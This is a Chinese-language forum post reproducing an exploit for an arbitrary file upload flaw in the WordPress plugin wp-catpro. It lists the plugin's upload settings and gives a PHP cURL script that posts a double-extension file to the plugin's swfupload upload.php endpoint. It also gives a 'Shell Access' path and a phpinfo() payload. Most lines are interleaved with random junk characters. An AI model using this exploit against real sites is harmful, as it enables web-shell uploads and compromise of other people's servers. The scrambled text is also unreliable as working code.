找回密码
 立即注册
查看: 3075|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
/ @9 r( z+ Y, U#-----------------------------------------------------------------------! P# V" v6 x+ V* O$ t  K
& d: e) B* V. o
作者  => Zikou-16, A$ ?8 Q( _' _/ f+ q" R
邮箱 => zikou16x@gmail.com
, |2 n' z3 E& Y! V1 d9 |测试系统 : Windows 7 , Backtrack 5r3
( F9 n) @# @9 J% A" H下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
* Y3 ~. o# a' T4 b7 L####
( j" q* I3 M% j5 N/ K, x # p9 w0 ^, m  M$ {! q9 H
#=> Exploit 信息:" |. L+ @8 \& P1 M4 K& X
------------------& k2 {; @3 Z* n+ Y9 o; f0 H0 \1 J: ~
# 攻击者可以上传 file/shell.php.gif
: I' G4 H& ?" u/ p# ("jpg", "gif", "png")  // Allowed file extensions4 r1 i; I; P# w
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
0 v/ `: }+ S7 t# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)- `4 w; Q' t" @; U# @. z, h; z1 |
------------------: t* L7 V8 e3 ?) Y4 _" \% C) d' s

  H3 L( O4 L% N4 Y0 N% |- p/ v/ {; y#=> Exploit$ j$ [& V# G+ v& J; [' n
-----------
. [0 K9 k% l+ O. _<?php
. f! h; M/ Y: ]# \
! z9 {4 D% @, z/ f% {! E$uploadfile="zik.php.gif";
( \  `( B+ x( |' G$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
5 C8 i- T8 W( h( W, {  s% `- Ocurl_setopt($ch, CURLOPT_POST, true);
9 j; M3 M: d1 @% h- w# D* X; Ocurl_setopt($ch, CURLOPT_POSTFIELDS,5 L0 P9 D( d7 |2 C9 b: M* ]
array('Filedata'=>"@$uploadfile",
& V3 h( P+ N1 n; r'folder'=>'/wp-content/uploads/catpro/'));( F$ V! U, ?# e% j7 ]$ [  W0 E! t, u
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
: {! P  @' H0 S3 W$postResult = curl_exec($ch);0 R( a6 j+ i& {% y
curl_close($ch);
6 h! M7 G2 D6 [2 |7 ?. _! ~$ o 5 _# e/ K& @, W8 z
print "$postResult";
+ _3 P9 R. O- w0 y* K ; i3 w% q9 ^8 \- x1 U2 M+ x1 }
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif6 ?& Q$ t( k/ ]
  ?>
: ?: b# ?/ ~8 a  w) g% {: x<?php4 Z( T! K$ _6 w* A& @5 d
phpinfo();
& w  |5 }1 @. C?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表